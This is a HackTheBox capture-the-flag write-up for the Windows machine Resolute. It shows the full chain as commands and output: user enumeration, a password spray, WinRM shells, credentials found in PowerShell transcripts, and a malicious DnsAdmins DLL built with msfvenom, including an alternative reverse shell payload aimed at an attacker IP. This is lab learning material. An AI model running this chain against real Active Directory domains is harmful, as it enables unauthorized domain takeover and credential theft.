HackTheBox Resolute
Writeup for HackTheBox Resolute
Machine Synopsis
Resolute is an easy difficulty Windows machine that features Active Directory. The Active Directory anonymous bind is used to obtain a password that the sysadmins set for new user accounts, although it seems that the password for that account has since changed. A password spray reveals that this password is still in use for another domain user account, which gives us access to the system over WinRM. A PowerShell transcript log is discovered, which has captured credentials passed on the command-line. This is used to move laterally to a user that is a member of the DnsAdmins group. This group has the ability to specify that the DNS Server service loads a plugin DLL. After restarting the DNS service, we achieve command execution on the domain controller in the context of NT_AUTHORITY\SYSTEM. (Source)
Key exploitation techniques:
- Active Directory anonymous LDAP bind for information disclosure
- Password spray for valid credentials
- WinRM for initial user access
- PowerShell transcript log analysis for credential discovery
- Lateral movement
DnsAdminsgroup abuse for arbitrary DLL loading and RCE
Enumeration
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
❯ nmap -p- --min-rate 10000 10.10.10.169
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49671/tcp open unknown
49680/tcp open unknown
49681/tcp open unknown
49688/tcp open unknown
49713/tcp open unknown
63433/tcp open unknown
❯ nmap -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49671,49680,49681,49688,49713,63433 -sC -sV 10.10.10.169
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-02-06 01:49:47Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49680/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49681/tcp open msrpc Microsoft Windows RPC
49688/tcp open msrpc Microsoft Windows RPC
49713/tcp open msrpc Microsoft Windows RPC
63433/tcp closed unknown
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows
The scan identified a Windows Domain Controller (RESOLUTE) running Active Directory services. megabank.local was added to /etc/hosts.
1
❯ echo -e '10.10.10.169\tmegabank.local' | sudo tee -a /etc/hosts
rpcclient was used with a null session to enumerate domain users, revealing a list of potential usernames.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
❯ rpcclient -U "" -N 10.10.10.169
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
...
user:[marko] rid:[0x457]
...
rpcclient $> queryuser marko
User Name : marko
Full Name : Marko Novak
...
Description : Account created. Password set to Welcome123!
...
The queryuser marko command revealed a password hint in the description: Welcome123!. Although marko’s account was no longer using this password, it was a strong candidate for password spraying.
All enumerated users were saved to users.txt. kerbrute was used to validate these users.
1
2
3
4
5
6
7
8
❯ kerbrute -domain megabank.local -users users.txt -dc-ip 10.10.10.169
...
[*] Valid user => Administrator
...
[*] Valid user => ryan
...
[*] Valid user => melanie
...
impacket-GetNPUsers was used to check for users with UF_DONT_REQUIRE_PREAUTH set, but none were found.
Exploitation
Password Spray & Initial Access (melanie)
A password spray was performed using nxc with the discovered password Welcome123! against the list of valid users.
1
2
3
4
❯ nxc smb megabank.local -u users.txt -p Welcome123! --continue-on-success
SMB 10.10.10.169 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
...
SMB 10.10.10.169 445 RESOLUTE [+] megabank.local\melanie:Welcome123!
The password Welcome123! was valid for melanie. evil-winrm was used to gain a shell as melanie.
1
2
3
4
❯ evil-winrm -i 10.10.10.169 -P 5985 -u melanie -p 'Welcome123!'
*Evil-WinRM* PS C:\Users\melanie\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\melanie\Desktop> type user.txt
1c3161947f44efe99fc0caf2175edcf5
The user.txt flag was retrieved.
Privilege Escalation
PowerShell Transcript Log & Lateral Movement (ryan)
Enumeration of users in C:\Users\ revealed ryan.
1
2
3
4
5
*Evil-WinRM* PS C:\Users\melanie\Desktop> cd C:\Users
*Evil-WinRM* PS C:\Users> ls
...
d----- 9/27/2019 7:05 AM ryan
...
A hidden directory PSTranscripts was found in C:\ using dir -force. This directory contained PowerShell transcript logs.
1
2
3
4
5
6
7
8
9
10
*Evil-WinRM* PS C:\Users> cd C:\
*Evil-WinRM* PS C:\> dir -force
...
d--h-- 12/3/2019 6:32 AM PSTranscripts
...
*Evil-WinRM* PS C:\PSTranscripts> cd 20191203
*Evil-WinRM* PS C:\PSTranscripts\20191203> dir -force
Mode LastWriteTime Length Name
---- ------------- ------ ----
-arh-- 12/3/2019 6:45 AM 3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
The PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt file was downloaded and reviewed. It contained a command with plaintext credentials.
1
2
3
4
5
❯ cat PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
...
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
...
The password for ryan was Serv3r4Admin4cc123!. Lateral movement to ryan was achieved via evil-winrm.
1
❯ evil-winrm -i 10.10.10.169 -P 5985 -u ryan -p 'Serv3r4Admin4cc123!'
On ryan’s desktop, note.txt indicated a 1-minute auto-revert for system changes (excluding administrator account changes).
1
2
3
4
*Evil-WinRM* PS C:\Users\ryan\desktop> type note.txt
Email to team:
- due to change freeze, any system changes (apart from those to the administrator account) will be automatically reverted within 1 minute
whoami /groups revealed ryan was a member of the DnsAdmins group.
1
2
3
4
5
6
7
*Evil-WinRM* PS C:\Users\ryan\Documents> whoami /groups
GROUP INFORMATION
-----------------
...
MEGABANK\DnsAdmins Alias S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
...
DnsAdmins Group Abuse (SYSTEM)
Membership in the DnsAdmins group allows an attacker to load an arbitrary DLL into the DNS Server service, which runs as NT AUTHORITY\SYSTEM. This is a common privilege escalation vector.
A malicious DLL payload was generated using msfvenom to reset the Administrator password.
1
❯ msfvenom -p windows/x64/exec cmd='net user administrator P@ssw0rd /domain' -f dll > hehe.dll
(Alternatively, for a reverse shell: msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.xx.xx LPORT=443 -f dll -o rev.dll)
An SMB server was set up on the attacking machine to host the malicious DLL.
1
❯ impacket-smbserver share ./
From the ryan shell, the DNS settings were modified using dnscmd to load the malicious DLL upon service restart.
1
2
3
4
*Evil-WinRM* PS C:\Users\ryan\desktop> dnscmd 127.0.0.1 /config /serverlevelplugindll \\10.10.16.4\share\hehe.dll
Registry property serverlevelplugindll successfully reset.
Command completed successfully.
The DNS service was then manually stopped and started to trigger DLL loading.
1
2
3
4
5
6
7
8
9
10
11
12
*Evil-WinRM* PS C:\Users\ryan\desktop> sc.exe stop dns
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 3 STOP_PENDING
...
*Evil-WinRM* PS C:\Users\ryan\desktop> sc.exe start dns
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 2 START_PENDING
...
The Administrator password was successfully reset to P@ssw0rd. Final login as Administrator via evil-winrm confirmed full system compromise.
1
2
3
4
❯ evil-winrm -i 10.10.10.169 -P 5985 -u administrator -p 'P@ssw0rd'
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
60d344a054c92723949cf2b4c775449c